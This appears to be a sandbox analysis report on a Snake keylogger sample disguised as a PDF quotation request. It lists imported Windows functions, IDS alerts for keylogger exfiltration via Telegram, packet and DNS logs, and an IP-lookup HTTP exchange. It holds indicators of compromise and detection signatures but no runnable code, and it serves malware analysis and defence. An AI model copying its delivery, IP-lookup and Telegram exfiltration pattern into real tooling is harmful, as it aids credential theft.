USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Language of compilation system | Country where language is spoken | Map
English | United States

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-16T08:44:34.594664+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49790 | 172.217.19.174 | 443 | TCP
2024-12-16T08:44:42.104474+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49812 | 158.101.44.242 | 80 | TCP
2024-12-16T08:44:50.151400+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49812 | 158.101.44.242 | 80 | TCP
2024-12-16T08:44:52.642100+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49837 | 149.154.167.220 | 443 | TCP
2024-12-16T08:44:54.198292+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49844 | 158.101.44.242 | 80 | TCP
2024-12-16T08:44:56.153699+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49846 | 149.154.167.220 | 443 | TCP
2024-12-16T08:44:59.615943+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49857 | 149.154.167.220 | 443 | TCP
2024-12-16T08:45:04.530721+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49869 | 149.154.167.220 | 443 | TCP
2024-12-16T08:45:18.338618+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49904 | 149.154.167.220 | 443 | TCP
2024-12-16T08:45:21.677927+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49913 | 149.154.167.220 | 443 | TCP
2024-12-16T08:45:25.312878+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49924 | 149.154.167.220 | 443 | TCP
2024-12-16T08:45:28.684774+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49932 | 149.154.167.220 | 443 | TCP
2024-12-16T08:45:31.974564+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49943 | 149.154.167.220 | 443 | TCP
2024-12-16T08:45:36.359279+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49955 | 149.154.167.220 | 443 | TCP
2024-12-16T08:45:39.676339+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49963 | 149.154.167.220 | 443 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                Dec 16, 2024 08:44:39.669868946 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.669929028 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.677251101 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.678807974 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.678833008 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.678886890 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.687410116 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.687535048 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.687575102 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.687637091 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.697531939 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.697628021 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.697686911 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.697756052 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.707856894 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.707962990 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.708019972 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.708080053 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.717940092 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.718033075 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.718060970 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.718111992 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.728110075 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.728219032 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.728243113 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.728296995 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.737409115 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.737484932 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.737538099 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.737597942 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.746656895 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.746742964 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.746771097 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.746820927 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.755804062 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.755939960 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.755961895 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.756016016 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.764530897 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.764643908 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.764663935 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.764719963 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.764727116 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.764775991 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.765996933 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.766064882 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.766113997 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.766253948 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.766319990 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:40.353423119 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:40.473366022 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:40.473494053 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:40.474033117 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:40.593760014 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:41.679105997 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:41.683551073 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:41.803436995 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:42.057377100 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:42.104474068 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:42.422727108 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:42.422823906 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:42.422918081 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:42.425184965 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:42.425215960 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:43.654217005 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:43.654310942 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:43.666914940 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:43.666961908 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:43.667469025 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:43.671585083 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:43.715364933 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:44.086445093 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:44.086535931 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:44.086828947 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:44.116072893 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:49.734045029 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:49.853914022 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:50.107709885 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:50.151400089 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:50.253815889 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:50.253858089 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:50.253952026 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:50.254537106 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:50.254549026 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.025641918 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.025757074 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:52.028283119 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:52.028291941 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.028635025 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.030006886 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:52.071330070 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.071393967 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:52.071405888 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.642225981 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.642437935 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.642497063 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:52.642832041 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:52.812614918 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:52.813914061 CET4984480192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:52.932749987 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.932802916 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:52.934752941 CET8049844158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.934848070 CET4984480192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:52.934993982 CET4984480192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:53.054811001 CET8049844158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:54.144963980 CET8049844158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:54.146260977 CET49846443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:54.146294117 CET44349846149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:54.146445036 CET49846443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:54.147033930 CET49846443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:54.147047043 CET44349846149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:54.198292017 CET4984480192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:55.509083033 CET44349846149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:55.511086941 CET49846443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:55.511121988 CET44349846149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:55.511174917 CET49846443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:55.511188984 CET44349846149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:56.153738976 CET44349846149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:56.153834105 CET44349846149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:56.153906107 CET49846443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:56.154582977 CET49846443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:56.180176973 CET4985280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:56.299979925 CET8049852158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:56.300121069 CET4985280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:56.300303936 CET4985280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:56.420012951 CET8049852158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:57.522845984 CET8049852158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:57.524162054 CET49857443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:57.524192095 CET44349857149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:57.524271011 CET49857443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:57.524559021 CET49857443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:57.524574995 CET44349857149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:57.573242903 CET4985280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:58.897640944 CET44349857149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:58.899199009 CET49857443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:58.899219036 CET44349857149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:58.899266005 CET49857443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:58.899272919 CET44349857149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:59.616122007 CET44349857149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:59.616312981 CET44349857149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:59.616415024 CET49857443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:38.990716934 CET49963443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:38.990742922 CET44349963149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:38.990812063 CET49963443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:38.990823030 CET44349963149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:39.676471949 CET44349963149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:39.676654100 CET44349963149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:39.676963091 CET49963443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:39.677161932 CET49963443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:39.711726904 CET4996180192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:39.712874889 CET4996980192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:39.831820965 CET8049961193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:39.832354069 CET4996180192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:39.832556009 CET8049969193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:39.832647085 CET4996980192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:39.832798004 CET4996980192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:39.952444077 CET8049969193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:41.929605007 CET8049969193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:41.979615927 CET4996980192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:43.294691086 CET49979443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:43.294718027 CET44349979149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:43.294787884 CET49979443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:43.295155048 CET49979443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:43.295170069 CET44349979149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:44.718249083 CET44349979149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:44.760890961 CET49979443192.168.2.5149.154.167.220
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 16, 2024 08:44:31.831710100 CET6201653192.168.2.51.1.1.1
                                                                                                                                Dec 16, 2024 08:44:31.969788074 CET53620161.1.1.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:34.617038012 CET6480153192.168.2.51.1.1.1
                                                                                                                                Dec 16, 2024 08:44:34.754390001 CET53648011.1.1.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:40.209338903 CET5098153192.168.2.51.1.1.1
                                                                                                                                Dec 16, 2024 08:44:40.347033978 CET53509811.1.1.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:42.281481981 CET5128053192.168.2.51.1.1.1
                                                                                                                                Dec 16, 2024 08:44:42.421469927 CET53512801.1.1.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:50.111534119 CET6011353192.168.2.51.1.1.1
                                                                                                                                Dec 16, 2024 08:44:50.249928951 CET53601131.1.1.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:21.708029985 CET6479253192.168.2.51.1.1.1
                                                                                                                                Dec 16, 2024 08:45:21.845316887 CET53647921.1.1.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:25.338399887 CET5536453192.168.2.51.1.1.1
                                                                                                                                Dec 16, 2024 08:45:25.476124048 CET53553641.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 08:44:31.831710100 CET | 192.168.2.5 | 1.1.1.1 | 0xd0f1 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:44:34.617038012 CET | 192.168.2.5 | 1.1.1.1 | 0x34f8 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:44:40.209338903 CET | 192.168.2.5 | 1.1.1.1 | 0x15da | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:44:42.281481981 CET | 192.168.2.5 | 1.1.1.1 | 0xfd42 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:44:50.111534119 CET | 192.168.2.5 | 1.1.1.1 | 0xc95c | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:45:21.708029985 CET | 192.168.2.5 | 1.1.1.1 | 0x9dc7 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:45:25.338399887 CET | 192.168.2.5 | 1.1.1.1 | 0xc269 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 08:44:31.969788074 CET | 1.1.1.1 | 192.168.2.5 | 0xd0f1 | No error (0) | drive.google.com |  | 172.217.19.174 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:44:34.754390001 CET | 1.1.1.1 | 192.168.2.5 | 0x34f8 | No error (0) | drive.usercontent.google.com |  | 142.250.181.1 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:44:40.347033978 CET | 1.1.1.1 | 192.168.2.5 | 0x15da | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 08:44:40.347033978 CET | 1.1.1.1 | 192.168.2.5 | 0x15da | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:44:40.347033978 CET | 1.1.1.1 | 192.168.2.5 | 0x15da | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:44:40.347033978 CET | 1.1.1.1 | 192.168.2.5 | 0x15da | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:44:40.347033978 CET | 1.1.1.1 | 192.168.2.5 | 0x15da | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:44:40.347033978 CET | 1.1.1.1 | 192.168.2.5 | 0x15da | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:44:42.421469927 CET | 1.1.1.1 | 192.168.2.5 | 0xfd42 | No error (0) | reallyfreegeoip.org |  | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:44:42.421469927 CET | 1.1.1.1 | 192.168.2.5 | 0xfd42 | No error (0) | reallyfreegeoip.org |  | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:44:50.249928951 CET | 1.1.1.1 | 192.168.2.5 | 0xc95c | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:45:21.845316887 CET | 1.1.1.1 | 192.168.2.5 | 0x9dc7 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 08:45:21.845316887 CET | 1.1.1.1 | 192.168.2.5 | 0x9dc7 | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:45:21.845316887 CET | 1.1.1.1 | 192.168.2.5 | 0x9dc7 | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:45:21.845316887 CET | 1.1.1.1 | 192.168.2.5 | 0x9dc7 | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:45:21.845316887 CET | 1.1.1.1 | 192.168.2.5 | 0x9dc7 | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:45:21.845316887 CET | 1.1.1.1 | 192.168.2.5 | 0x9dc7 | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:45:25.476124048 CET | 1.1.1.1 | 192.168.2.5 | 0xc269 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 08:45:25.476124048 CET | 1.1.1.1 | 192.168.2.5 | 0xc269 | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:45:25.476124048 CET | 1.1.1.1 | 192.168.2.5 | 0xc269 | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:45:25.476124048 CET | 1.1.1.1 | 192.168.2.5 | 0xc269 | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:45:25.476124048 CET | 1.1.1.1 | 192.168.2.5 | 0xc269 | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 08:45:25.476124048 CET | 1.1.1.1 | 192.168.2.5 | 0xc269 | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
                                                                                                                                • drive.google.com
                                                                                                                                • drive.usercontent.google.com
                                                                                                                                • reallyfreegeoip.org
                                                                                                                                • api.telegram.org
                                                                                                                                • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49812 | 158.101.44.242 | 80 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 08:44:40.474033117 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
Dec 16, 2024 08:44:41.679105997 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:41 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 1d9ebfb391616416dc46c0a0778fae27
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
